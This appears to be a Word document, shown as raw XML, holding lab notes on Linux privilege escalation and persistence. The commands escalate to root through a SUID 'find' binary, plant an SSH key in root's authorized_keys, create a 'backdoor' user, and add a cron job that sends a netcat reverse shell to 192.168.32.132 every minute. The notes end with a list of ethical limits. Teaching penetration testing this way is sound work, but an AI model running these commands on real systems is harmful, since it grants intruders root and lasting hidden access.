          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="4078F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00790EE9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="4078F2"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r w:rsidRPr="00790EE9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r w:rsidRPr="00790EE9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="4078F2"/>
        </w:rPr>
        <w:t>-perm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4078F2"/>
        </w:rPr>
        <w:t>-4000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E45649"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00790EE9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="4078F2"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00790EE9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/null </w:t>
      </w:r>
      <w:r w:rsidRPr="00790EE9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="4078F2"/>
        </w:rPr>
        <w:t>|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4078F2"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:r w:rsidRPr="00790EE9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00790EE9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="4078F2"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="50F87F5E" w14:textId="77777777" w:rsidR="00501341" w:rsidRPr="00501341" w:rsidRDefault="00501341" w:rsidP="00501341">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501341">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Find SUID Binaries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI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</w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="880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5376"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501341" w:rsidRPr="00501341" w14:paraId="76F60ED7" w14:textId="77777777" w:rsidTr="005013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092B" w14:textId="77777777" w:rsidR="00501341" w:rsidRPr="00501341" w:rsidRDefault="00501341" w:rsidP="005013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01341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val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>find / -perm -4000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BB686" w14:textId="77777777" w:rsidR="00501341" w:rsidRPr="00501341" w:rsidRDefault="00501341" w:rsidP="005013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01341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Search for files with SUID bit set</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501341" w:rsidRPr="00501341" w14:paraId="56A2F85A" w14:textId="77777777" w:rsidTr="005013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437FA" w14:textId="77777777" w:rsidR="00501341" w:rsidRPr="00501341" w:rsidRDefault="00501341" w:rsidP="005013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01341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val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>2&gt;/dev/null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464FD" w14:textId="77777777" w:rsidR="00501341" w:rsidRPr="00501341" w:rsidRDefault="00501341" w:rsidP="005013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01341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Hide permission errors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501341" w:rsidRPr="00501341" w14:paraId="1F436D65" w14:textId="77777777" w:rsidTr="005013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889C" w14:textId="77777777" w:rsidR="00501341" w:rsidRPr="00501341" w:rsidRDefault="00501341" w:rsidP="005013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01341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val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t xml:space="preserve">| grep </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00501341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val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>find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BA270" w14:textId="77777777" w:rsidR="00501341" w:rsidRPr="00501341" w:rsidRDefault="00501341" w:rsidP="005013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</w:pPr>
            <w:r w:rsidRPr="00501341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PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>Filter for "find" in the results</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30934D41" w14:textId="437740AA" w:rsidR="00501341" w:rsidRPr="00501341" w:rsidRDefault="00501341" w:rsidP="00501341">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7D1F4B" w14:textId="0FEB7610" w:rsidR="00501341" w:rsidRDefault="00501341" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571CFD48" w14:textId="7CC6F043" w:rsidR="00501341" w:rsidRDefault="00501341" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C8E2889" w14:textId="77777777" w:rsid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-exec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/bin/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sh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383A42"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>\;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-quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5482E498" w14:textId="198ACAAE" w:rsidR="00501341" w:rsidRP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4078F2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501341">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploit SUID find to Become Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA97261" w14:textId="1785FD92" w:rsid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Why:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> Because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find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> runs as root (SUID), the shell also runs as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5D96FE" w14:textId="437656A7" w:rsid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hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE73057" w14:textId="77777777" w:rsidR="00501341" w:rsidRPr="00790EE9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74738881" w14:textId="77777777" w:rsidR="00501341" w:rsidRDefault="00501341" w:rsidP="00501341">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00501341">
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00501341">
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hoam</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DB0B49C" w14:textId="3193215C" w:rsidR="00501341" w:rsidRPr="00501341" w:rsidRDefault="00501341" w:rsidP="00501341">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501341">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify You Are Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5124C05D" w14:textId="77777777" w:rsidR="00501341" w:rsidRPr="00501341" w:rsidRDefault="00501341" w:rsidP="00501341">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A62116A" w14:textId="5F42E0F4" w:rsidR="00501341" w:rsidRDefault="00501341" w:rsidP="00501341">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23BCDB7E" w14:textId="1F3D2500" w:rsidR="00501341" w:rsidRDefault="00501341" w:rsidP="00501341">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5341415B" w14:textId="77777777" w:rsid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/root/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thefinalflag.tx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t </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5248CD" w14:textId="177A8B5E" w:rsidR="00501341" w:rsidRPr="00501341" w:rsidRDefault="00501341" w:rsidP="00501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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501341">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Read Final Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C13BA2" w14:textId="0DE00271" w:rsidR="00501341" w:rsidRDefault="00501341" w:rsidP="00501341">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F4C0FCA" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRPr="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21EC8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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21EC8">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>How Attackers Maintain Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5406A0D5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After hacking a system, attackers want to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t>keep coming back</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t> even if the system reboots or the vulnerability gets patched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CA73C1" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00501341">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEFFBA1" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21E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Method 1: Add SSH Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9533E5" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21E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8F49AF5" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21EC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echo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ssh-rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="50A14F"/>
        </w:rPr>
        <w:t xml:space="preserve"> AAAAB3..."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&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t>ssh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authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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722"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F21EC8" w14:paraId="22D27762" w14:textId="77777777" w:rsidTr="00F21E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5668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D6D4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Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="38DC0BBC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A172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SSH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911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Like a digital fingerprint that grants access without password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="75951096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EAFC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authorized_keys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5AE85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list of "approved fingerprints" allowed to log in</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72AA3663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Analogy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t> Adding your friend's name to the building's guest list permanently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F56363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Result:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t> Attacker can SSH in as root anytime, no password needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF28457" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21EC8">
      <w:pPr>
        <w:spacing w:before="480" w:after="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="08C6D5F0">
          <v:rect id="_x0000_i1029" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#0f1115" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CBBA00" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21E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Method 2: Create Backdoor User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAB54EA" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21E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69E55059" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21EC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useradd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-s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/bash backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D486124" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21EC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passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t xml:space="preserve"> backdoor</w:t>
      </w:r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239"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F21EC8" w14:paraId="7A26B5C0" w14:textId="77777777" w:rsidTr="00F21E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370C0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6B4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Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="2020EA78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70ED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3F669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Creates a new user account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="7B4715C4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CCA5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-m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A19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Creates a home folder for them</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="17E84851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0B91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-s /bin/bash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7B42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Gives them a command shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="3D28F68C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B0BB7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passwd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D3F7A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Sets a password (attacker knows it)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="678740C8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Analogy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t> Making a secret spare key and hiding it outside.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACD3663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Result:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t> Attacker has a hidden account they can always use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAC45DD" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21EC8">
      <w:pPr>
        <w:spacing w:before="480" w:after="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="4F0A01B2">
          <v:rect id="_x0000_i1030" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#0f1115" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1500F738" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21E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Method 3: Persistent Shell via Cron</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6118E134" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21EC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2847B22" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21EC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echo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"* * * * * </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="50A14F"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="50A14F"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="50A14F"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="50A14F"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.32.132 4445"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&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/crontab</w:t>
      </w:r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406"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F21EC8" w14:paraId="4E4C70FD" w14:textId="77777777" w:rsidTr="00F21E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488C3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90A2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Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="50C9F7DE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78774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45C6A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scheduler that runs commands automatically at set times</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="72D9A66F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6E3AD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* * * *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95BF6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 every minute of every hour of every day</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="1A976C68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2E7C3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-e /bin/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1EC00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Send a shell to the attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="3C8EE0AC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6924C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192.168.32.132 4445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3025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Attacker's IP and port to connect to</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="504DE92B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Analogy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t> Setting an alarm that secretly calls the attacker every minute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F709C9" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21EC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Result:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t> Even if attacker loses access, they'll get a new shell within 60 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FC45A1" w14:textId="2D338A09" w:rsidR="00501341" w:rsidRDefault="00501341" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D434B98" w14:textId="09B7D546" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0881548E" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21EC8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Ethical Limitations (What You CANNOT Do)</w:t>
      </w:r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5385"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F21EC8" w14:paraId="532B423A" w14:textId="77777777" w:rsidTr="00F21E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5717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011E4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Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="01A508C1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88236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Only access authorized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834F9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Hack only machines you have PERMISSION to hack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="3626BF95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94DA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 not modify or delete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446A3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Don't change files, don't delete anything</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="5D2A846A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0898E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Stop after proof of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9B891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Once you prove you can hack, STOP. Don't go further</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="09AC6ADD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CC5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B27A3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Tell the owner what you found, don't exploit it secretly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="368C612D" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21EC8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692CAF8">
          <v:rect id="_x0000_i1033" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#0f1115" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4278BA5D" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21E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Why These Limitations Exist</w:t>
      </w:r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5282"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F21EC8" w14:paraId="62EEBCF2" w14:textId="77777777" w:rsidTr="00F21E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25269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Without Ethics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4AB5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 Ethics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="39C222A3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7CC8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become a criminal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701EF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become a security professional</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="67A964CE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7A7F2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destroy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DBDD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protect data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21EC8" w14:paraId="46E6625C" w14:textId="77777777" w:rsidTr="00F21E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D2387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go to jail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8D314" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21E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 get paid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C7D83BE" w14:textId="13447D91" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4591DA26" w14:textId="076ABFAC" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F2E6F79" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21EC8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Misconfigured permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43774D4C" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21EC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52DD3C5E" w14:textId="0E20C9BD" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="00F21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-perm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-4000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E45649"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>2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&gt;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/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558F71E6" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRPr="00790EE9" w:rsidRDefault="00F21EC8" w:rsidP="00F21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-exec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/bin/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>sh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383A42"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>\;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-quit</w:t>
      </w:r>
    </w:p>
